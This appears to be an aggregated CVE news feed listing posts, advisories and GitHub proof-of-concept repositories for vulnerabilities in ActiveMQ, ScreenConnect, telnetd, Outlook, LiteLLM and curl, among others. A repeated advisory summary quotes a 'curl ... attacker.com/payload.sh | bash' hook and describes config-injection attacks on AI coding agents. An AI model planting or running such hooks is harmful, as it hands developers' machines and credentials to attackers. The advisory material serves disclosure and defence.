##updated 2026-04-16T21:49:17
2 posts
9 repos
https://github.com/Catherines77/ActiveMQ-EXPtools
https://github.com/hg0434hongzh0/CVE-2026-34197
https://github.com/keraattin/CVE-2026-34197
https://github.com/dinosn/CVE-2026-34197
https://github.com/AtoposX-J/CVE-2026-34197-Apache-ActiveMQ-RCE
https://github.com/KONDORDEVSECURITYCORP/CVE-2026-34197
https://github.com/xshysjhq/CVE-2026-34197-payload-Apache-ActiveMQ-
Remote Code Execution in Apache ActiveMQ
"By calling addNetworkConnector through Jolokia with a crafted URI, an attacker can chain these mechanisms together to force the broker to fetch and execute a remote Spring XML configuration file"
https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/
##Remote Code Execution in Apache ActiveMQ
"By calling addNetworkConnector through Jolokia with a crafted URI, an attacker can chain these mechanisms together to force the broker to fetch and execute a remote Spring XML configuration file"
https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/
##updated 2026-04-15T18:32:04
1 posts
Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##updated 2026-04-15T00:35:42.020000
1 posts
1 repos
🚨 New Exploit: GeographicLib v2.5.1 - stack buffer overflow
📋 CVE: CVE-2025-60751
👤 Author: rosario
🔗 https://www.exploit-db.com/exploits/52522
#ExploitDB #InfoSec #CyberSecurity #CVE-2025-60751
##updated 2026-04-10T18:31:28
1 posts
@adulau@infosec.exchange @gcve@social.circl.lu For context: #Buildroot has tools to list known vulnerabilities for packages, currently based on NVD data (via https://github.com/fkie-cad/nvd-json-data-feeds).
I noticed it's missing a bunch of vulnerabilities (e.g. CVE-2026-40200, CVE-2026-6042 in musl libc) because the NVD data is missing CPE match information. At the time the CVEs were listed as "Awaiting Analysis", now "Deferred", so I assume it's not going to be added any time soon, if ever (generally the CPE match is present for vulnerabilities in "Analyzed" status). Looking at the GCVE listings was an attempt to find another, hopefully better, source, because an automated check that misses so many vulnerabilities is not going to be very useful.
Today @Bubu@chaos.social pointed me at a similar example: CVE-2025-6020 (note the year), a "high" level vulnerability in linux-pam, which is also marked as "Deferred" in NVD. So we really could use a better source.
We'd need one we can download (rather than query individual packages one by one) without excessive load, but solving that is another matter, first we need a suitable source at all.
updated 2026-04-10T12:31:44
1 posts
1 repos
@adulau@infosec.exchange @gcve@social.circl.lu For context: #Buildroot has tools to list known vulnerabilities for packages, currently based on NVD data (via https://github.com/fkie-cad/nvd-json-data-feeds).
I noticed it's missing a bunch of vulnerabilities (e.g. CVE-2026-40200, CVE-2026-6042 in musl libc) because the NVD data is missing CPE match information. At the time the CVEs were listed as "Awaiting Analysis", now "Deferred", so I assume it's not going to be added any time soon, if ever (generally the CPE match is present for vulnerabilities in "Analyzed" status). Looking at the GCVE listings was an attempt to find another, hopefully better, source, because an automated check that misses so many vulnerabilities is not going to be very useful.
Today @Bubu@chaos.social pointed me at a similar example: CVE-2025-6020 (note the year), a "high" level vulnerability in linux-pam, which is also marked as "Deferred" in NVD. So we really could use a better source.
We'd need one we can download (rather than query individual packages one by one) without excessive load, but solving that is another matter, first we need a suitable source at all.
updated 2026-04-03T17:16:41.710000
2 posts
CVE-2025-8065: TP-Link ONVIF stack buffer overflow
#CVE_2025_8065
https://labs.taszk.io/blog/post/125_tp_stack_bof_onvif/
CVE-2025-8065: TP-Link ONVIF stack buffer overflow
#CVE_2025_8065
https://labs.taszk.io/blog/post/125_tp_stack_bof_onvif/
updated 2026-04-02T18:31:50
1 posts
2 repos
@kubikpixel Behoben wurde die Schwachstelle bereits Anfang April mit der Veröffentlichung von OpenSSH 10.3
Detail Description :
https://nvd.nist.gov/vuln/detail/CVE-2026-35414
(mW ein weiterhin funktionierender und gemeinnütziger Service der Regierung der United States :awesome: )
updated 2026-03-21T05:29:22
1 posts
7 repos
https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE
https://github.com/HussainFathy/CVE-2024-1709
https://github.com/Teexo/ScreenConnect-CVE-2024-1709-Exploit
https://github.com/AMRICHASFUCK/Mass-CVE-2024-1709
https://github.com/AhmedMansour93/Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-
https://github.com/sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass
CISA's KEV catalog now includes CVE-2024-1708 and CVE-2024-1709 (ConnectWise ScreenConnect auth bypass + RCE chain) plus CVE-2026-32202 (Windows Shell). APT28 has been weaponizing these since December 2025. The...
##updated 2026-03-20T21:28:38
1 posts
4 repos
https://github.com/Sachinart/CVE-2025-32432
https://github.com/bambooqj/CVE-2025-32432
🚨 New Exploit: Craft CMS 5.6.16 - RCE
📋 CVE: CVE-2025-32432
👤 Author: banyamer
🔗 https://www.exploit-db.com/exploits/52525
#ExploitDB #InfoSec #CyberSecurity #CVE-2025-32432
##updated 2026-02-10T21:31:29
1 posts
1 repos
📢 Patch incomplet d'APT28 : CVE-2026-21510 laisse place à CVE-2026-32202, coercition d'authentification zero-click
📝 ## 🔍 Contexte
Publié le 23 avril 2026 par Maor Daha...
📖 cyberveille : https://cyberveille.ch/posts/2026-04-29-patch-incomplet-d-apt28-cve-2026-21510-laisse-place-a-cve-2026-32202-coercition-d-authentification-zero-click/
🌐 source : https://www.akamai.com/blog/security-research/incomplete-patch-apt28s-zero-day-cve-2026-32202
#APT28 #CVE_2026_21510 #Cyberveille
updated 2026-02-10T18:30:34
1 posts
69 repos
https://github.com/leonjza/inetutils-telnetd-auth-bypass
https://github.com/Gabs-hub/CVE-2026-24061_Lab
https://github.com/ms0x08-dev/CVE-2026-24061-POC
https://github.com/0xXyc/telnet-inetutils-auth-bypass-CVE-2026-24061
https://github.com/Chocapikk/CVE-2026-24061
https://github.com/athack-ctf/chall2026-telneted
https://github.com/SafeBreach-Labs/CVE-2026-24061
https://github.com/RStephanH/vuln-deb
https://github.com/przemytn/CVE-2026-24061
https://github.com/nrnw/CVE-2026-24061-GNU-inetutils-Telnet-Detector
https://github.com/xuemian168/CVE-2026-24061
https://github.com/killsystema/scan-cve-2026-24061
https://github.com/midox008/CVE-2026-24061
https://github.com/0x7556/CVE-2026-24061
https://github.com/shivam-bathla/CVE-2026-24061-setup
https://github.com/SystemVll/CVE-2026-24061
https://github.com/TryA9ain/CVE-2026-24061
https://github.com/0xBlackash/CVE-2026-24061
https://github.com/androidteacher/CVE-2026-24061-PoC-Telnetd
https://github.com/Alter-N0X/CVE-2026-24061-POC
https://github.com/balgan/CVE-2026-24061
https://github.com/lavabyte/telnet-CVE-2026-24061
https://github.com/BrainBob/Telnet-TestVuln-CVE-2026-24061
https://github.com/setuju/telnetd
https://github.com/Parad0x7e/CVE-2026-24061
https://github.com/BrainBob/CVE-2026-24061
https://github.com/ridpath/Terrminus-CVE-2026-2406
https://github.com/franckferman/CVE_2026_24061
https://github.com/SeptembersEND/CVE--2026-24061
https://github.com/X-croot/CVE-2026-24061_POC
https://github.com/dotelpenguin/telnetd_CVE-2026-24061_tester
https://github.com/Mefhika120/Ashwesker-CVE-2026-24061
https://github.com/ibrahmsql/CVE-2026-24061-PoC
https://github.com/m3ngx1ng/cve_2026_24061_cli
https://github.com/MY0723/GNU-Inetutils-telnet-CVE-2026-24061-
https://github.com/XsanFlip/CVE-2026-24061-Scanner
https://github.com/ilostmypassword/Melissae-Honeypot-Framework
https://github.com/hackingyseguridad/root
https://github.com/Remnant-DB/CVE-2026-24061
https://github.com/Ali-brarou/telnest
https://github.com/obrunolima1910/CVE-2026-24061
https://github.com/r00tuser111/CVE-2026-24061
https://github.com/typeconfused/CVE-2026-24061
https://github.com/buzz075/CVE-2026-24061
https://github.com/cumakurt/tscan
https://github.com/HD0x01/CVE-2026-24061-NSE
https://github.com/madfxr/Twenty-Three-Scanner
https://github.com/scumfrog/cve-2026-24061
https://github.com/ekomsSavior/telnet_scan
https://github.com/Lingzesec/CVE-2026-24061-GUI
https://github.com/punitdarji/telnetd-cve-2026-24061
https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root
https://github.com/h3athen/CVE-2026-24061
https://github.com/novitahk/Exploit-CVE-2026-24061
https://github.com/monstertsl/CVE-2026-24061
https://github.com/z3n70/CVE-2026-24061
https://github.com/JayGLXR/CVE-2026-24061-POC
https://github.com/tiborscholtz/CVE-2026-24061
https://github.com/canpilayda/inetutils-telnetd-cve-2026-24061
https://github.com/hyu164/Terrminus-CVE-2026-2406
https://github.com/0p5cur/CVE-2026-24061-POC
https://github.com/infat0x/CVE-2026-24061
https://github.com/Mr-Zapi/CVE-2026-24061
https://github.com/parameciumzhang/Tell-Me-Root
https://github.com/LucasPDiniz/CVE-2026-24061
🚨 New Exploit: GNU InetUtils 2.6 - Telnetd Remote Privilege Escalation
📋 CVE: CVE-2026-24061
👤 Author: aliguliyev
🔗 https://www.exploit-db.com/exploits/52524
#ExploitDB #InfoSec #CyberSecurity #CVE-2026-24061
##updated 2026-02-10T15:30:22
1 posts
12 repos
https://github.com/kimstars/Ashwesker-CVE-2026-21509
https://github.com/gavz/CVE-2026-21509-PoC
https://github.com/ksk-itdk/KSK-ITDK-CVE-2026-21509-Mitigation
https://github.com/suuhm/CVE-2026-21509-handler
https://github.com/planetoid/cve-2026-21509-mitigation
https://github.com/SimoesCTT/CTT-NFS-Vortex-RCE
https://github.com/SimoesCTT/SCTT-2026-33-0007-The-OLE-Vortex-Laminar-Bypass-
https://github.com/decalage2/detect_CVE-2026-21509
https://github.com/SimoesCTT/CTT-MICROSOFT-OFFICE-OLE-MANIFOLD-BYPASS-CVE-2026-21509
https://github.com/YoussefMami/CVE2026_21509
Patch Diffing CVE-2026-21509: Microsoft Office OLE Security Bypass
#CVE_2026_21509
https://blog.78researchlab.com/34cdb461-3e5b-808d-a9c9-dc1338adaccc
updated 2026-02-05T20:59:55.283000
1 posts
🚨 New Exploit: HAX CMS 24.x - Stored Cross-Site Scripting (XSS)
📋 CVE: CVE-2026-22704
👤 Author: banyamer
🔗 https://www.exploit-db.com/exploits/52526
#ExploitDB #InfoSec #CyberSecurity #CVE-2026-22704
##updated 2026-02-05T15:43:37
1 posts
Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##updated 2026-01-28T04:43:47
1 posts
🚨 New Exploit: phpMyFAQ 4.0.16 - Improper Authorization
📋 CVE: CVE-2026-24421
👤 Author: contact
🔗 https://www.exploit-db.com/exploits/52523
#ExploitDB #InfoSec #CyberSecurity #CVE-2026-24421
##updated 2026-01-16T19:29:47.410000
1 posts
1 repos
@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.
First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug into the original and update/regenerate the translation.
The former case is by no means unique to LLMs. For example, (human-executed) rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.
This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (https://newsletter.semianalysis.com/p/claude-code-is-the-inflection-point), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).
The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as https://dpc.pw/posts/i-dont-want-your-prs-anymore/), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 https://www.cs.fsu.edu/~whalley/papers/tecs06.pdf). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.
Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!
Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).
Thanks again for taking the time to write your thoughts down; looking forward to more discussion!
##updated 2025-12-19T22:08:03
1 posts
Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##updated 2025-11-24T17:38:57
1 posts
Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##updated 2025-11-05T20:30:33
1 posts
1 repos
Cisco has a new advisory for two critical vulnerabilities:
- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-rce-traversal-8bYndVrZ @TalosSecurity #Cisco
Broadcom:
High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 https://support.broadcom.com/web/ecx/security-advisory #Broadcom
Tenable research advisories posted this yesterday:
Spring AI SQL Injection in PgVectorStore and friends https://www.tenable.com/security/research/tra-2026-36 #infosec #vulnerability
##updated 2025-10-22T00:33:00
1 posts
35 repos
https://github.com/MSeymenD/CVE-2024-21413
https://github.com/olebris/CVE-2024-21413
https://github.com/bhatbhupendra/Moniker-Link--CVE-2024-21413-
https://github.com/dionissh/CVE-2024-21413
https://github.com/TheMursalin/HTB-Mailing-A-Complete-Walkthrough
https://github.com/r00tb1t/CVE-2024-21413-POC
https://github.com/th3Hellion/CVE-2024-21413
https://github.com/duy-31/CVE-2024-21413
https://github.com/eylommaayan/THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-
https://github.com/hau2212/Moniker-Link-CVE-2024-21413-
https://github.com/PolarisXSec/CVE-2024-21413
https://github.com/yass2400012/Email-exploit-Moniker-Link-CVE-2024-21413-
https://github.com/E-m-e-k-a/Moniker-Link-Lab-Setup
https://github.com/ShubhamKanhere307/CVE-2024-21413
https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
https://github.com/mmathivanan17/CVE-2024-21413
https://github.com/securenetexpert/CVE-2024-21413-Moniker-Link-Writeup
https://github.com/X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit
https://github.com/Heera-V/CVE2024-21413
https://github.com/ViniciusFariasDev/cve-2024-21413-outlook-monikerlink-lab
https://github.com/Cyber-Trambon/CVE-2024-21413-exploit
https://github.com/CMNatic/CVE-2024-21413
https://github.com/pedro-lucas-melo/Estudo-de-Caso-CVE-2024-21413
https://github.com/ThemeHackers/CVE-2024-21413
https://github.com/KartheekKandalam99/SVPT_CW_2
https://github.com/D1se0/CVE-2024-21413-Vulnerabilidad-Outlook-LAB
https://github.com/dshabani96/CVE-2024-21413
https://github.com/MQKGitHub/Moniker-Link-CVE-2024-21413
https://github.com/SallocinAvalcante/lab-SMB-responder-CVE-2024-21413
CVE-2024-21413 (CVSS 9.8) is actively exploited and bypasses Outlook Protected View to enable remote code execution and NTLM hash theft. Here’s the enterprise risk breakdown, detection strategy, and mitigation roadmap security leaders need now.
##updated 2025-10-22T00:32:47
2 posts
1 repos
Microsoft Update causing Print Spooler Problems - CVE-2019-1367 | https://techygeekshome.info/cve-2019-1367/?fsp_sid=40138 | #Guide #Microsoft #News #security #Updates #Windows
https://techygeekshome.info/cve-2019-1367/?fsp_sid=40138
Microsoft Update causing Print Spooler Problems - CVE-2019-1367 | https://techygeekshome.info/cve-2019-1367/?fsp_sid=40138 | #Guide #Microsoft #News #security #Updates #Windows
https://techygeekshome.info/cve-2019-1367/?fsp_sid=40138
updated 2025-10-03T14:16:36
1 posts
4 repos
https://github.com/DBarr3/AETHER-PROTOCOL-P
https://github.com/Rohitberiwala/Claude-Code-MCP-Injection-PoC
----------------
🎯 AI
===================
Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).
Technical details:
• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s http://attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).
• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).
• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).
Analysis:
These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.
Detection:
• Monitor agent startup behaviors that access project settings or .env files.
• Alert on agent-initiated outbound connections immediately after project open events.
• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).
Mitigation:
• Enforce least-privilege for agent file and environment access.
• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.
• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.
References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136
🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136
🔗 Source: https://www.geektime.co.il/ai-agent-config-files-attack-vector/
##updated 2025-03-19T15:51:05
1 posts
@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.
First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug into the original and update/regenerate the translation.
The former case is by no means unique to LLMs. For example, (human-executed) rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.
This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (https://newsletter.semianalysis.com/p/claude-code-is-the-inflection-point), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).
The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as https://dpc.pw/posts/i-dont-want-your-prs-anymore/), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 https://www.cs.fsu.edu/~whalley/papers/tecs06.pdf). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.
Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!
Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).
Thanks again for taking the time to write your thoughts down; looking forward to more discussion!
##updated 2023-01-27T05:05:44
1 posts
Just an update on the IObit Advanced SystemCare zero-day I posted about a couple days ago. I mentioned in that post VulDB marked it as a duplicate of CVE-2022-24138 and while I agree with the root cause analysis being the same (ProgramData permission issues) the actual exploit chain is quite different. I found a named pipe that lets a low-priv user trigger a SYSTEM integrity file write on-demand. Since IObit has a concrete history of not replying to researchers and history repeats, here is the full write-up:
https://github.com/usernameone101/Writeups/blob/main/IObit%20Zero%20Day%20(Updated%20v2).pdf
#zeroday #infosec #cybersec #cybersecurity #bug #vulnerability
##@adulau@infosec.exchange @gcve@social.circl.lu For context: #Buildroot has tools to list known vulnerabilities for packages, currently based on NVD data (via https://github.com/fkie-cad/nvd-json-data-feeds).
I noticed it's missing a bunch of vulnerabilities (e.g. CVE-2026-40200, CVE-2026-6042 in musl libc) because the NVD data is missing CPE match information. At the time the CVEs were listed as "Awaiting Analysis", now "Deferred", so I assume it's not going to be added any time soon, if ever (generally the CPE match is present for vulnerabilities in "Analyzed" status). Looking at the GCVE listings was an attempt to find another, hopefully better, source, because an automated check that misses so many vulnerabilities is not going to be very useful.
Today @Bubu@chaos.social pointed me at a similar example: CVE-2025-6020 (note the year), a "high" level vulnerability in linux-pam, which is also marked as "Deferred" in NVD. So we really could use a better source.
We'd need one we can download (rather than query individual packages one by one) without excessive load, but solving that is another matter, first we need a suitable source at all.
ooo its vulnerable to CVE-2026-25262
##ooo its vulnerable to CVE-2026-25262
##Critical SQL Injection Vulnerability in LiteLLM AI Gateway Exploited in the Wild
LiteLLM patched a critical pre-authentication SQL injection vulnerability (CVE-2026-42208) that allows attackers to steal cloud provider credentials and master API keys. The flaw was exploited in the wild within 36 hours of disclosure, targeting sensitive database tables used for AI gateway management.
**If you run LiteLLM, update to version 1.83.7 immediately to patch CVE-2026-42208, and isolate the proxy from the internet so it's only reachable from trusted networks. Assume any internet-exposed instance has been compromised - rotate all virtual API keys and provider credentials (OpenAI, Anthropic, AWS Bedrock) right away.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/critical-sql-injection-vulnerability-in-litellm-ai-gateway-exploited-in-the-wild-i-p-i-0-n/gD2P6Ple2L
Critical SQL Injection Vulnerability in LiteLLM AI Gateway Exploited in the Wild
LiteLLM patched a critical pre-authentication SQL injection vulnerability (CVE-2026-42208) that allows attackers to steal cloud provider credentials and master API keys. The flaw was exploited in the wild within 36 hours of disclosure, targeting sensitive database tables used for AI gateway management.
**If you run LiteLLM, update to version 1.83.7 immediately to patch CVE-2026-42208, and isolate the proxy from the internet so it's only reachable from trusted networks. Assume any internet-exposed instance has been compromised - rotate all virtual API keys and provider credentials (OpenAI, Anthropic, AWS Bedrock) right away.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/critical-sql-injection-vulnerability-in-litellm-ai-gateway-exploited-in-the-wild-i-p-i-0-n/gD2P6Ple2L
CVE-2026-42208: Targeted SQL injection against LiteLLM's authentication path discovered 36 hours following vulnerability disclosure | Sysdig
Read on HackerWorkspace: https://hackerworkspace.com/article/cve-2026-42208-targeted-sql-injection-against-litellm-s-authentication-path-discovered-36-hours-following-vulnerability-disclosure-sysdig
##Out of the eight new #curl CVEs, four of them had existed in code for over twenty years when we published.
CVE-2026-5545 clocks in at 22.75 years old
CVE-2026-7168 at 21.91 years
CVE-2026-6429 at 20.95 years
CVE-2026-6253 at 20.66 years
And yet CVE-2026-5545 only becomes the 5th oldest vulnerability ever found in curl so far.
##Out of the eight new #curl CVEs, four of them had existed in code for over twenty years when we published.
CVE-2026-5545 clocks in at 22.75 years old
CVE-2026-7168 at 21.91 years
CVE-2026-6429 at 20.95 years
CVE-2026-6253 at 20.66 years
And yet CVE-2026-5545 only becomes the 5th oldest vulnerability ever found in curl so far.
##Out of the eight new #curl CVEs, four of them had existed in code for over twenty years when we published.
CVE-2026-5545 clocks in at 22.75 years old
CVE-2026-7168 at 21.91 years
CVE-2026-6429 at 20.95 years
CVE-2026-6253 at 20.66 years
And yet CVE-2026-5545 only becomes the 5th oldest vulnerability ever found in curl so far.
##Out of the eight new #curl CVEs, four of them had existed in code for over twenty years when we published.
CVE-2026-5545 clocks in at 22.75 years old
CVE-2026-7168 at 21.91 years
CVE-2026-6429 at 20.95 years
CVE-2026-6253 at 20.66 years
And yet CVE-2026-5545 only becomes the 5th oldest vulnerability ever found in curl so far.
##🟠 CVE-2026-41649 - High (7.7)
Outline is a service that allows for collaborative documentation. The `shares.create` API endpoint starting in version 0.86.0 and prior to version 1.7.0 has an insecure direct object reference.. When both `collectionId` and `documentId` are provid...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-41649/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##----------------
🎯 AI
===================
Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).
Technical details:
• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s http://attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).
• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).
• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).
Analysis:
These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.
Detection:
• Monitor agent startup behaviors that access project settings or .env files.
• Alert on agent-initiated outbound connections immediately after project open events.
• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).
Mitigation:
• Enforce least-privilege for agent file and environment access.
• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.
• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.
References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136
🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136
🔗 Source: https://www.geektime.co.il/ai-agent-config-files-attack-vector/
##